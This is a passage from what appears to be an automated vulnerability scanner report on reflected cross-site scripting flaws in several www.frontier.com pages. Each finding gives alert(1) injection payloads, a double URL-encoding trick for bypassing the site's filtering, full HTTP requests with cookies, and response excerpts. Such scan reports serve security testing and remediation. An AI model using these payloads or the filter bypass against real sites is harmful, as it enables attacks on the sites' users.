$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo17124';alert(1)//df531ca5181/fpsearchlg.asp?type=biz');//]]>
...[SNIP]...
|
2.89. http://www.frontier.com/yahoo/fpsearchlg.asp [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/yahoo/fpsearchlg.asp |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b was submitted in the REST URL parameter 2. This input was echoed as a4f61';alert(1)//5fb1c88860b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /yahoo/fpsearchlg.aspa4f61%2527%253balert%25281%2529%252f%252f5fb1c88860b?type=biz HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo/fpsearchlg.aspa4f61';alert(1)//5fb1c88860b?type=biz');//]]>
...[SNIP]...
|
2.90. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://www.frontier.com |
| Path: |
/yahoo/fy_excl2.aspx |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69d70'%3b8506878fe2 was submitted in the REST URL parameter 1. This input was echoed as 69d70';8506878fe2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /yahoo69d70'%3b8506878fe2/fy_excl2.aspx HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response (redirected)
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43315
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/yahoo69d70';8506878fe2/fy_excl2.aspx');//]]>
...[SNIP]...
|
2.91. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://www.frontier.com |
| Path: |
/yahoo/fy_excl2.aspx |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 747f9%2527%253balert%25281%2529%252f%252fcb0ef15e2ce was submitted in the REST URL parameter 2. This input was echoed as 747f9';alert(1)//cb0ef15e2ce in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /yahoo/fy_excl2.aspx747f9%2527%253balert%25281%2529%252f%252fcb0ef15e2ce HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43633
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo/fy_excl2.aspx747f9';alert(1)//cb0ef15e2ce');//]]>
...[SNIP]...
|
2.92. https://www.frontier.com/AgentOrdering/Login/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
https://www.frontier.com |
| Path: |
/AgentOrdering/Login/ |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dcc6'%3balert(1)//b78c0a9a96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7dcc6';alert(1)//b78c0a9a96c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /AgentOrdering/Login/?7dcc6'%3balert(1)//b78c0a9a96c=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA
|
Response
HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48631
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/AgentOrdering/Login/Default.aspx?7dcc6';alert(1)//b78c0a9a96c=1');
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}
function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return Va
...[SNIP]...
|
2.93. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 1]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
https://www.frontier.com |
| Path: |
/AgentOrdering/Login/Default.aspx |
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf4af'-alert(1)-'9ff1a208c26e1167f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
| GET /AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167f/Login/Default.aspx?__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTQyNjYzNDI3OA9kFgJmD2QWAmYPZBYEAgkPFgIeBFRleHQFow48ZGl2IGlkPSJoZWFkZXIiPgogIDxkaXYgY2xhc3M9ImhlYWRlck5hdiI%2BCiAgICA8ZGl2IGlkPSJsZWZ0SGVhZGVyIj4KICAgICAgPGRpdiBjbGFzcz0ibG9nbyI%2BCiAgICAgICAgPGEgaWQ9ImhvbWVMaW5rIiB0aXRsZT0iRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMiIGhyZWY9Ii8iPgogICAgICAgICAgPGltZyBhbHQ9IkZyb250aWVyTG9nbyIgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vZnJvbnRpZXJfTG9nby5qcGciIGJvcmRlcj0iMCIgaGVpZ2h0PSI1MSIgd2lkdGg9IjE1NiI%2BCiAgICAgICAgPC9hPgogICAgICA8L2Rpdj4KICAgICAgPHVsIGlkPSJkcm9wZG93bl9uYXYiPgogICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb25PTkxZTEVHQUNZIiBocmVmPSIvQmlsbFBheS9Mb2dpbi5hc3B4Ij5PbmxpbmUgQmlsbCBQYXk8L2E%2BPC9saT4KICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL2Zyb250aWVyLm15LnlhaG9vLmNvbS8iPkZyb250aWVyIE15IFlhaG9vITwvYT48L2xpPgogICAgICAgIDxsaT48YSBocmVmPSJodHRwczovL2xvZ2luLmZyb250aWVyLmNvbS93ZWJtYWlsLyI%2BRnJvbnRpZXIgTWFpbDwvYT48L2xpPgogICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb25PTkxZTEVHQUNZIiBocmVmPSIvU2hvcC9Mb2dpbi5hc3B4Ij5NeSBBY2NvdW50PC9hPjwvbGk%2BCiAgICAgICAgPGxpIGlkPSJzZWxlY3RlZCIgY2xhc3M9ImFnZW50bG9naW4iPkFnZW50IExvZ2luIAogICAgICAgICAgPGRpdiBjbGFzcz0iYXJyb3ciPjxpbWcgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vc21hbGxfYXJyb3cucG5nIiBib3JkZXI9IjAiIGhlaWdodD0iNCIgd2lkdGg9IjciPjwvZGl2PgogICAgICAgICAgPHVsPgogICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL0FnZW50T3JkZXJpbmcvTG9naW4vIj5SZXNpZGVudGlhbCBBZ2VudDwvYT48L2xpPgogICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL0J1c2luZXNzQWdlbnRPcmRlci9Mb2dpbi8iPkJ1c2luZXNzIEFnZW50PC9hPjwvbGk%2BCiAgICAgICAgICA8L3VsPgogICAgICAgIDwvbGk%2BCiAgICAgIDwvdWw%2BCiAgICAgIDxkaXYgY2xhc3M9ImxvY2F0aW9uIj5DdXJyZW50IExvY2F0aW9uOgogICAgICAgIDxhIGlkPSJMb2NhbGUiIGNsYXNzPSJjaGFuZ2VMb2NhbGUiIGhyZWY9IiMiPlNlbGVjdCBMb2NhdGlvbjwvYT4KICAgICAgPC9kaXY%2BCiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9InJpZ2h0SGVhZGVyIj4KICAgICAgPGZvcm0gYWN0aW9uPSIjIj4KICAgICAgICA8ZGl2IGNsYXNzPSJzZWFyY2hCb3giPgogICAgICAgICAgPGlucHV0IGlkPSJ0eHRTZWFyY2giIGNsYXNzPSJzZWFyY2hUZXh0IiBuYW1lPSJ0eHRTZWFyY2giPgogICAgICAgICAgPGlucHV0IGlkPSJidG5TZWFyY2giIGNsYXNzPSJTZWFyY2hCdXR0b24iIHZhbHVlPSIiIHNyYz0iL0ltYWdlcy9GVFJNYWluL3NlYWNoX2J0bi5naWYiIG5hbWU9ImJ0blNlYXJjaCIgdHlwZT0iaW1hZ2UiPiA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJzZWFyY2hCdXR0b25zIj4KICAgICAgICAgIDxpbnB1dCB2YWx1ZT0iRnJvbnRpZXIiIGNoZWNrZWQ9ImNoZWNrZWQiIG5hbWU9InJkb1NlYXJjaCIgdHlwZT0icmFkaW8iPgogICAgICAgICAgPHNwYW4gaWQ9IlNGTGluayI%2BU2VhcmNoIEZyb250aWVyPC9zcGFuPgogICAgICAgICAgPGlucHV0IHZhbHVlPSJQb3J0YWwiIG5hbWU9InJkb1NlYXJjaCIgdHlwZT0icmFkaW8iPgogICAgICAgICAgPHNwYW4gaWQ9IlNXTGluayI%2BU2VhcmNoIHRoZSBXZWI8L3NwYW4%2BCiAgICAgICAgPC9kaXY%2BCiAgICAgIDwvZm9ybT4KICAgIDwvZGl2PgogIDwvZGl2Pgo8L2Rpdj5kAgsPZBYMAgEPZBYCAgEPZBYCZg9kFgJmD2QWAgIBD2QWBgIHDw8WBB8ABQ1FbnRlciBQaG9uZSAjHgtOYXZpZ2F0ZVVybAVKL1JlZ2lvbi9EZWZhdWx0LmFzcHg%2FdHlwZT0xJnVybD0lMmZBZ2VudE9yZGVyaW5nJTJmTG9naW4lMmZEZWZhdWx0LmFzcHglM2ZkZAIJDw8WAh8BBUovUmVnaW9uL0RlZmF1bHQuYXNweD90eXBlPTEmdXJsPSUyZkFnZW50T3JkZXJpbmclMmZMb2dpbiUyZkRlZmF1bHQuYXNweCUzZmRkAgsPDxYCHgdWaXNpYmxlaGRkAgMPZBYCAgEPZBYCZg8WAh8ABbwBPGRpdiBpZD0iVG9wTmF2X0NvbnRhaW5lciI%2BDQoJCTwvZGl2Pg0KPGlucHV0IG5hbWU9ImhmUGFnZVR5cGUiIHR5cGU9ImhpZGRlbiIgaWQ9ImhmUGFnZVR5cGUiIHZhbHVlPSIxIi8%2BDQo8aW5wdXQgbmFtZT0iaGZSZWNvcmRfVHlwZSIgdHlwZT0iaGlkZGVuIiBpZD0iaGZSZWNvcmRfVHlwZSIgdmFsdWU9IkNhdGVnb3J5Ii8%2BDQpkAgkPZBYGAgEPDxYCHwJnZBYCAgEPFgQfAAVjPGEgaHJlZj0iL0RlZmF1bHQuYXNweCI%2BSG9tZTwvYT4gJnJhcXVvOyA8YSBocmVnPSIvQWdlbnRPcmRlcmluZy8iPkFnZW50IE9yZGVyaW5nPC9hPiAmcmFxdW87IExvZ2luHwJnZAIDDxYCHwJoZAIFD2QWBAIBDxYCHwAF%2FAE8cD48c3Ryb25nPkxvZ2luIEZvciBGcm9udGllciBBZ2VudHMvUGFydG5lcnMgT25seS4gIEN1c3RvbWVycyBwbGVhc2UgdmlzaXQgPGJyPiA8YSBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyLmNvbSI%2BRnJvbnRpZXIgUmVzaWRlbnRpYWwgSG9tZSBQYWdlPC9hPiBvciA8YSBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyLmNvbS9DdXN0b21lclNlcnZpY2UvIj5Db250YWN0IFVzIFBhZ2U8L2E%2BIGZvciBBc3Npc3RhbmNlLjwvc3Ryb25nPjwvcD5kAg8PDxYCHgxFcnJvck1lc3NhZ2UFjgc8cCBhbGlnbj0ibGVmdCI%2BDQoJCQkJPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5Zb3UgaGF2ZSBlbnRlcmVkIGFuIEludmFsaWQgVXNlcm5hbWUgb3IgUGFzc3dvcmQuIFBsZWFzZSBub3RlIHRoYXQgdGhpcyBsb2dpbiBpcyBmb3IgQWdlbnRzL1BhcnRuZXJzIG9mIEZyb250aWVyIENvbW11bmljYXRpb25zIG9ubHkuPC9zcGFuPiA8L3A%2BDQo8dWw%2BDQo8cCBhbGlnbj0ibGVmdCI%2BPC9wPg0KPGxpPg0KPGRpdiBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5JZiB5b3UgYXJlIGEgUmVzaWRlbnRpYWwgQ3VzdG9tZXIsIHBsZWFzZSBjb250YWN0IDEtODAwLTkyMS04MTAxIG9yIHZpc2l0IHRoZSA8L3NwYW4%2BPGEgdGl0bGU9IlJlc2lkZW50aWFsIENvbnRhY3QgVXMgcGFnZSIgaHJlZj0iL2N1c3RvbWVyc2VydmljZS8iIHRhcmdldD0iX3NlbGYiPjxzcGFuIHN0eWxlPSJDT0xPUjogI2ZmMDAwMCI%2BUmVzaWRlbnRpYWwgQ29udGFjdCBVcyBwYWdlPC9zcGFuPjwvYT7CoDxzcGFuIHN0eWxlPSJDT0xPUjogI2ZmMDAwMCI%2BdG8gcmVhY2ggQ3VzdG9tZXIgU2VydmljZS48L3NwYW4%2BPC9kaXY%2BPC9saT4NCjxwIGFsaWduPSJsZWZ0Ij48c3BhbiBzdHlsZT0iQ09MT1I6ICNmZjAwMDAiPjwvc3Bhbj48L3A%2BDQo8cCBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj48L3NwYW4%2BPC9wPg0KPGxpPg0KPGRpdiBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5JZiB5b3UgYXJlIGFuIEFnZW50L1BhcnRuZXIgb2YgRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMgYW5kIG5lZWQgYXNzaXN0YW5jZSB3aXRoIHlvdXIgTG9naW4sIHBsZWFzZSBjb250Y |